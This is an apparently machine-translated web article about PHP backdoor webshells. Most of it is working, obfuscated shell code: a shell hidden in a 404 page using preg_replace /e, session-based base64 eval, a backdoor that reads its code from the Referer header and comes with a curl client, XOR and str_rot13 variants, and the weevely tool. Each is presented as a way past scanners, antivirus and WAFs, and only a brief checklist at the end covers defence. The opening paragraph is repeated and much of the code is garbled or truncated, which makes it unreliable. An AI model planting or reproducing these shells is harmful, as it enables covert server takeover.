We treat these PHP backdoors with a learning attitude. Many PHP backdoors let us see how painstaking the programmers are. This type of backdoor poses a headache for website and server administrators. They often need to use different methods for detection. Many new writing technologies cannot be found and processed using common detection methods. Today we have several details
We treat these PHP backdoors with a learning attitude. Many PHP backdoors let us see how painstaking the programmers are. This type of backdoor poses a headache for website and server administrators. They often need to use different methods for detection. Many new writing technologies cannot be found and processed using common detection methods. Today we have several details
We treat these PHP backdoors with a learning attitude. Many PHP backdoors let us see how painstaking the programmers are. This type of backdoor poses a headache for website and server administrators. They often need to use different methods for detection. Many new writing technologies cannot be found and processed using common detection methods. Today, we will detail some interesting PHP sentence Trojans.
Hide the PHP pony with the 404 page
404 Not Found
Not Found
The requested URL was not found on this server.
@ Preg_replace ("/[pageerror]/e", $ _ POST ['error'], "saft ");
Header ('HTTP/1.1 404 Not Found ');
?>
404 pages are commonly used files on websites. It is generally recommended that few people check and modify them. At this time, we can use this to hide backdoors.
Hide a PHP sentence without features
Session_start ();
$ _ POST ['code'] & $ _ SESSION ['thecode'] = trim ($ _ POST ['code']);
$ _ SESSION ['thecode'] & preg_replace ('\ 'a \ 'eis', 'E '. 'V '. 'A '. 'l '. '(base64_decode ($ _ SESSION [\ 'thecode \']) ', 'A ');
Assign the content of $ _ POST ['code'] to $ _ SESSION ['thecode'] and then execute $ _ SESSION ['thecode']. The highlight is that there is no signature. If you use a scanning tool to check the code, no alarm will be triggered.
Super hidden PHP Backdoor
? A = assert & B =$ {fputs % 28 fopen % 28base64_decode % 28Yy5waH
After execution, the current directory generates c. php one-sentence Trojan. When parameter a is set to eval, an error is reported. When parameter a is set to eval, an error is reported. If parameter a is set to assert, but a trojan is generated. This is a simple sentence, is extended to such applications.
Hierarchical request, code to run PHP Backdoor
This method is implemented using two files, file 1
// 1.php header ('content-type: text/html; charset = UTF-8 ');
Parse_str ($ _ SERVER ['HTTP _ referer'], $ );
If (reset ($ a) = '10' & count ($ a) = 9 ){
Eval (base64_decode (str_replace ("", "+", implode (array_slice ($ a, 6 )))));
}
File 2
// 2.php
Header ('content-type: text/html; charset = UTF-8 ');
// Code to be executed
$ Code = <
// Base64 encoding
$ Code = base64_encode ($ code );
// Construct a referer string
$ Referer = "a = 10 & B = AB & c = 34 & d = re & e = 32 & f = km & g = {$ code} & h = & I = ";
// Backdoor url
$ Url = 'HTTP: // localhost/test1/1. php ';
$ Ch = curl_init ();
$ Options = array (
CURLOPT_URL => $ url,
CURLOPT_HEADER => FALSE,
CURLOPT_RETURNTRANSFER => TRUE,
CURLOPT_REFERER => $ referer );
Curl_setopt_array ($ ch, $ options );
Echo curl_exec ($ ch );
Use HTTP_REFERER in the HTTP request to run base64-encoded code to achieve the backdoor effect. Generally, waf requires loose or no referer detection. Bypass
Waf is good.
PHP webshell generation tool weevely
Weevely is a free software for PHP webshell. It can be used to simulate a connection shell similar to telnet. weevely is usually used to exploit web program vulnerabilities, hide backdoors or use telnet instead of web
Page-based management: the server-side php code generated by weevely is base64 encoded, so we can cheat the Mainstream anti-virus software and IDS. After uploading the server-side code, we can usually run it directly through weevely.
The PHP backdoor generated by weevely uses the mainstream base64 encryption and string deformation technology. All functions used in the backdoor are commonly used string processing functions, functions such as eval and system that are used as check rules do not directly appear in the code, which can cause the backdoor file to bypass the check of the backdoor search tool. Scan by using the webshell detection and removal tool of the hidden group. The results show that the file has no threats.
The above is a rough introduction. Below is a simple introduction to the use method.
Three distorted PHP Trojans
First:
Write 1.php? in the menu? 2 = The assert password is 1.
Second:
$ _ = "";
$ _ [+ ""] = '';
$ _ = "$ _"."";
$ _ = ($ _ [+ ""] | ""). ($ _ [+ ""] | ""). ($ _ [+ ""] ^ "");
?>
$ {'_'. $ _} ['_'] ($ {'_'. $ _} ['_']);
?>
Write 2.php in the kitchen knife? _ = Assert & __= eval ($ _ POST ['pass'])
The password is pass. If you use a kitchen knife to append data, it is more concealed, or you can use other injection tools, because it is submitted by post.
Third:
($ B4dboy =$ _ POST ['b4dboys']) & @ preg_replace ('/ad/E ','@'. str_rot13 ('riny '). '($ b4dboy)', 'add ');
Str_rot13 ('riny') is the encoded eval. It completely avoids keywords, without losing the effect, making people vomit!
How to deal with PHP webshell
We emphasize several key points. If you read this article, you believe it is not a layman, so I will not be embarrassed:
1. Be aware of the security of PHP programming.
2. server log files should be read frequently and backed up frequently.
3. Strictly assign permissions to each site.
4. Frequent batch security reviews on dynamic files and directories.
5. Learn how to perform the "behavior detection and removal" manual anti-virus.
6. always pay attention to or penetrate into active network security camps.
7. Perform hierarchical processing on the server environment, and even a function can be used as a rule.
Tags-php, php backdoor, php Trojan
Original article address: Let's talk about the powerful PHP backdoor Trojan. Thank you for sharing it with me.
